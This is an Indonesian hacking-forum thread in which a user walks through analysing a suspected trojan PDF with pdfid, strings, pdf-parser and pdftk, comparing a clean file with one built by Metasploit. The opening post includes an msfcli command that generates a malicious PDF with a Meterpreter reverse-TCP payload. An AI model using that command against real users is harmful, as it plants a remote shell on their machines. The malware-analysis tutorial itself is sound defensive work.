[Share] Analysis PDF file contains a trojan
#1
Introduction !!!

Pada kesempatan ini saya akan menulis beberapa tahapan bagaimana menganalisa file dokumen *.PDF untuk menentukan Apakah dokumen tersebut berbahaya atau tidak.
Hal ini terjadi beberapa waktu lalu ketika saya mencoba untuk men-download sebuah e-book dan kemudian file tersebut terdeteksi oleh anti-virus yang saya gunakan. ini membuat saya menjadi curiga dan kemudian saya mencoba untuk menganalisa dokumen tersebut.
berikut beberapa langkah yang saya lakukan untuk menganalisis.

Saya akan melakukan perbandingan antara dokumen PDF yang bersih dengan dokumen yg di bungkus oleh trojan

Equipment :
1. pdfid
2. pdf-parser
3. pdftk. 'apt-get install pdftk'
4. strings


press thanks button Big Grin Big Grin

[hide]
pada tahap pertama saya akan menganalisa dokumen "analysis.pdf" yang tidak disisipi oleh trojan.
Spoiler! :

[Image: 1.png]


OK, now let's go it!

langkah pertamana untuk menampilkan value yang ada serta bahasa pendukung yang di munculkan dari dokumen diatas
Code:
# pdfid analysis.pdf
Spoiler! :

[Image: 1.png]


terlihat dari output yang ditampilkan kita hanya perlu memperhatikan baris JS / Java Script. diatas menunjukkan bahwa dokumen tersebut bebas dari adanya penyisipan trojan. terbukti nilai yang ditampilkan pada baris JS / Java Script adalah "0" berarti tidak ada text atau perintah dengan menggunakan script java.
jadi, itu berarti kita tidak perlu menganalisis lebih lanjut Smile

maka mari kita coba untuk menganalisa dokumen yang berisi trojan, dan di sini saya menggunakan metasploit untuk memanipulasi trojan menjadi dokumen pdf
Code:
# msfcli exploit/windows/browser/adobe_media_newplayer PAYLOAD=windows/meterpreter/reverse_tcp SRVHOST=192.168.1.3 SRVPORT=4455 URIPATH=/ LHOST=192.168.1.3 LPORT=4444 E
Spoiler! :

[Image: 2.png]


selanjutnya mendownload file tersebut.
Spoiler! :

[Image: 1.png]


pada gambar diatas terlihat versi yang di gunakan metasploit untuk membuat file *.pdf adalah versi 1.5.

selanjutnya melakukan hal yang sama pada tahap sebelumnya menggunakan perintah "pdfid"
Code:
# pdfid trojanPDF.pdf
Spoiler! :

[Image: 1.png]


terlihat pada baris JS/JavaScript memiliki value "1" yang berarti dalam dokumen tersebut terdapat perintah atau text menggunakan JavaScript.
selanjutnya menggunakan perintah "strings" untuk melihat JavaScript dalam bentuk text.
Code:
# strings trojanPDF.pdf
Spoiler! :

[Image: 1.png]


output pada gambar diatas terlihat tidak adanya JavaScript yang muncul dalam bentuk teks, ini mungkin merupakan upaya metasploit untuk mengenkripsi text java tersebut agar tidak mudah di temukan, hmm i like metasploit Wink

next, parse the PDF document
Code:
# pdf-parser -f trojanPDF.pdf
Spoiler! :

[Image: 1.png]


perintah diatas juga tidak bisa menemukan adanya baris Java Script. metasploit benar2 mengenkripsikan code tersebut upaya mempersulit analysis. salut deh buat metasploit >_<

tidak hanya sampai disini, berikut cara terakhir yang saya gunakan.
Di sini saya akan membuat duplikate dokumen dan menghapus semua pengkodean dokumen "trojanPDF.pdf" dan menyalinnya ke dokumen baru dengan nama "trojanPDF-2.pdf"
Code:
# pdftk trojanPDF.pdf output trojanPDF-2.pdf uncompress
Spoiler! :

[Image: 1.png]


setelah duplicate berhasil kita buat, kemudian gunakan perintah "strings" untuk menampilkan tampilan dokumen yg akan kita cetak.
Code:
# strings trojanPDF-2.pdf
Spoiler! :

[Image: 1.png]


yuhuuu, berhasil Smile
text java script berhasil muncul Smile dan jelas terlihat bahwa dokumen diatas memiliki infeksi trojan -_-"

# saran = hati-hati kalau mau download e-book apalagi dari sumber yang tidak jelas Smile

source
[/hide]

Regards IBTeam

Moved to:
/ Attacker Zone / Malware - Malicious Software v / Share - Analysis PDF file contains a trojan
by
iKONs
Code:
Username :   [ Hidemichi-Hiroyuki]

Password :   [     ********      ]

#2
Mantap ... Mau Ke TKP Dulu Praktek ....

#3
(02-05-2014, 07:49 PM)xsteganography Wrote: Mantap ... Mau Ke TKP Dulu Praktek ....

Smile iya bang, langsung aja test satu2 e-book yang ada di simpen Smile

@iKONspirasi hehehe iya om, tadi sempet bingung juga sih mau naruk di mana Smile
makasih om Smile
Code:
Username :   [ Hidemichi-Hiroyuki]

Password :   [     ********      ]

#4
nice one bro .. +2 rep ... ini sangat berguna untuk berjaga2 dari serangan trojan atau malware .. keep share bro
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#5
(02-06-2014, 05:02 PM)zee eichel Wrote: nice one bro .. +2 rep ... ini sangat berguna untuk berjaga2 dari serangan trojan atau malware .. keep share bro

thanks bro mimin Big Grin cendol di terima Smile
Code:
Username :   [ Hidemichi-Hiroyuki]

Password :   [     ********      ]

#6
ane baru tahu selain peepdf juga ada pdfid

#7
wah pdftk buat uncompress pdf biar bisa decode kode yg disembunyikan, keren bro
+1 dari gw

#8
(04-20-2014, 06:03 PM)iKONspirasi Wrote: wah pdftk buat uncompress pdf biar bisa decode kode yg disembunyikan, keren bro
+1 dari gw

thanks om iKon Smile
Code:
Username :   [ Hidemichi-Hiroyuki]

Password :   [     ********      ]

#9
Thanks info nya, ane baru tau PDF bisa disisipin trojan, tadi nya ane kira aman -_-

#10
maaf om melenceng ^_^ , saya pake ubuntu 14.04.3 LTS , udh saya install metasploit framework terbaru, tapi waktu saya jalankan msfcli terjadi eror seperti ini [ http://prntscr.com/9iahpz ] , sudah saya cari solusi di forum ubuntu tidak ada, mohon bantuan'nya mas ^_^ #Thanks






Users browsing this thread: 1 Guest(s)